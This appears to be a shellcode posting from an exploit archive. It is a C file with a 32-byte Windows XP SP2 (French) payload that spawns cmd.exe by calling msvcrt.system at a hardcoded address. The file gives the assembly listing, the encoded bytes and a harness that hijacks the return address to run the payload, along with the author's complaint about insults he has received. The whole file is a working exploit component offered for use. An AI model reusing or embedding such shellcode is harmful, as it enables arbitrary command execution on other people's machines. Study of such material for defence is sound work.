/* windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes Author : Mountassif Moad Big Thnx : Houssamix & SimO-s0fT Changed by : Stack Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR My first original shellcode Here http://www.milw0rm.com/shellcode/7971 because i receive every day full message who insult me (you'r lamer - fucker -> you dont understand anything abouts sec ) infinity of insult and the last time i receive an message have => i make full error in my first shelcode & in the end he insult my mother & me (shit) so i tell all people when want insult anyone remembers we are just human not angel euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd ) Assembly Code : this time is not a secret (:@) 00402000 8BEC MOV EBP,ESP 00402002 33FF XOR EDI,EDI 00402004 57 PUSH EDI 00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63 00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D 0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64 00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1 00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00402018 50 PUSH EAX 00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine) 0040201E FFD0 CALL EAX */ #include "stdio.h" unsigned char shellcode[] = "\x8B\xEC\x33\xFF\x57" "\xC6\x45\xFC\x63\xC6\x45" "\xFD\x6D\xC6\x45\xFE\x64" "\xC6\x45\xF8\x01\x8D" "\x45\xFC\x50\xB8\xC7\x93" "\xBF\x77\xFF\xD0"; int main () { int *ret; ret=(int *)&ret+2; printf("Shellcode Length is : %d\n",strlen(shellcode)); (*ret)=(int)shellcode; return 0; }